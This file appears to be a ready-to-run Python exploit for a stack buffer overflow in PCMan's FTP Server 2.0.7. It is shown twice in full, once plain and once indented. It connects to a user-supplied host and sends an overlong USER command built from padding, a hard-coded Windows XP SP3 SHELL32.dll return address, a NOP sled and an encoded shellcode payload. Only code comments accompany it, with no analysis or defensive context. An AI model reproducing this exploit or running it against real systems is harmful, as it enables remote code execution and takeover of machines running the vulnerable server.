0-ali/PCMan.py

## PCMan.py
# Final PCMan's FTP Server v2.0.7 Exploit

import sys, socket, time

host = sys.argv[1] # Recieve IP from user
port = int(sys.argv[2]) # Recieve Port from user

buf =  ""
buf += "\xda\xdf\xd9\x74\x24\xf4\x5b\xbe\xba\x06\x35\xe1\x31"
buf += "\xc9\xb1\x31\x83\xc3\x04\x31\x73\x14\x03\x73\xae\xe4"
buf += "\xc0\x1d\x26\x6a\x2a\xde\xb6\x0b\xa2\x3b\x87\x0b\xd0"
buf += "\x48\xb7\xbb\x92\x1d\x3b\x37\xf6\xb5\xc8\x35\xdf\xba"
buf += "\x79\xf3\x39\xf4\x7a\xa8\x7a\x97\xf8\xb3\xae\x77\xc1"
buf += "\x7b\xa3\x76\x06\x61\x4e\x2a\xdf\xed\xfd\xdb\x54\xbb"
buf += "\x3d\x57\x26\x2d\x46\x84\xfe\x4c\x67\x1b\x75\x17\xa7"
buf += "\x9d\x5a\x23\xee\x85\xbf\x0e\xb8\x3e\x0b\xe4\x3b\x97"
buf += "\x42\x05\x97\xd6\x6b\xf4\xe9\x1f\x4b\xe7\x9f\x69\xa8"
buf += "\x9a\xa7\xad\xd3\x40\x2d\x36\x73\x02\x95\x92\x82\xc7"
buf += "\x40\x50\x88\xac\x07\x3e\x8c\x33\xcb\x34\xa8\xb8\xea"
buf += "\x9a\x39\xfa\xc8\x3e\x62\x58\x70\x66\xce\x0f\x8d\x78"
buf += "\xb1\xf0\x2b\xf2\x5f\xe4\x41\x59\x35\xfb\xd4\xe7\x7b"
buf += "\xfb\xe6\xe7\x2b\x94\xd7\x6c\xa4\xe3\xe7\xa6\x81\x1c"
buf += "\xa2\xeb\xa3\xb4\x6b\x7e\xf6\xd8\x8b\x54\x34\xe5\x0f"
buf += "\x5d\xc4\x12\x0f\x14\xc1\x5f\x97\xc4\xbb\xf0\x72\xeb"
buf += "\x68\xf0\x56\x88\xef\x62\x3a\x61\x8a\x02\xd9\x7d"

# Return Address 0x7C9D30D7 in SHELL32.dll (Win XP SP3)
ret = '\xD7\x30\x9D\x7C' # Packed in little endian

# NOP Padding
nop = '\x90'*20

# EIP Writing Pattern
pattern = "A"*2004 + ret + nop + buf # Our exploit together. Junk -&gt; Return Address -&gt; NOPS -&gt; Shellcode
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket
client.connect((host, port)) # Connect to user supplied port and IP address
client.recv(1024) # Recieve FTP Banner
client.send("USER " + pattern) # Send the user command with a variable length name
client.close() # Close the Connection
	# Final PCMan's FTP Server v2.0.7 Exploit

	import sys, socket, time

	host = sys.argv[1] # Recieve IP from user
	port = int(sys.argv[2]) # Recieve Port from user

	buf = ""
	buf += "\xda\xdf\xd9\x74\x24\xf4\x5b\xbe\xba\x06\x35\xe1\x31"
	buf += "\xc9\xb1\x31\x83\xc3\x04\x31\x73\x14\x03\x73\xae\xe4"
	buf += "\xc0\x1d\x26\x6a\x2a\xde\xb6\x0b\xa2\x3b\x87\x0b\xd0"
	buf += "\x48\xb7\xbb\x92\x1d\x3b\x37\xf6\xb5\xc8\x35\xdf\xba"
	buf += "\x79\xf3\x39\xf4\x7a\xa8\x7a\x97\xf8\xb3\xae\x77\xc1"
	buf += "\x7b\xa3\x76\x06\x61\x4e\x2a\xdf\xed\xfd\xdb\x54\xbb"
	buf += "\x3d\x57\x26\x2d\x46\x84\xfe\x4c\x67\x1b\x75\x17\xa7"
	buf += "\x9d\x5a\x23\xee\x85\xbf\x0e\xb8\x3e\x0b\xe4\x3b\x97"
	buf += "\x42\x05\x97\xd6\x6b\xf4\xe9\x1f\x4b\xe7\x9f\x69\xa8"
	buf += "\x9a\xa7\xad\xd3\x40\x2d\x36\x73\x02\x95\x92\x82\xc7"
	buf += "\x40\x50\x88\xac\x07\x3e\x8c\x33\xcb\x34\xa8\xb8\xea"
	buf += "\x9a\x39\xfa\xc8\x3e\x62\x58\x70\x66\xce\x0f\x8d\x78"
	buf += "\xb1\xf0\x2b\xf2\x5f\xe4\x41\x59\x35\xfb\xd4\xe7\x7b"
	buf += "\xfb\xe6\xe7\x2b\x94\xd7\x6c\xa4\xe3\xe7\xa6\x81\x1c"
	buf += "\xa2\xeb\xa3\xb4\x6b\x7e\xf6\xd8\x8b\x54\x34\xe5\x0f"
	buf += "\x5d\xc4\x12\x0f\x14\xc1\x5f\x97\xc4\xbb\xf0\x72\xeb"
	buf += "\x68\xf0\x56\x88\xef\x62\x3a\x61\x8a\x02\xd9\x7d"

	# Return Address 0x7C9D30D7 in SHELL32.dll (Win XP SP3)
	ret = '\xD7\x30\x9D\x7C' # Packed in little endian

	# NOP Padding
	nop = '\x90'*20

	# EIP Writing Pattern
	pattern = "A"*2004 + ret + nop + buf # Our exploit together. Junk -> Return Address -> NOPS -> Shellcode
	client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket
	client.connect((host, port)) # Connect to user supplied port and IP address
	client.recv(1024) # Recieve FTP Banner
	client.send("USER " + pattern) # Send the user command with a variable length name
	client.close() # Close the Connection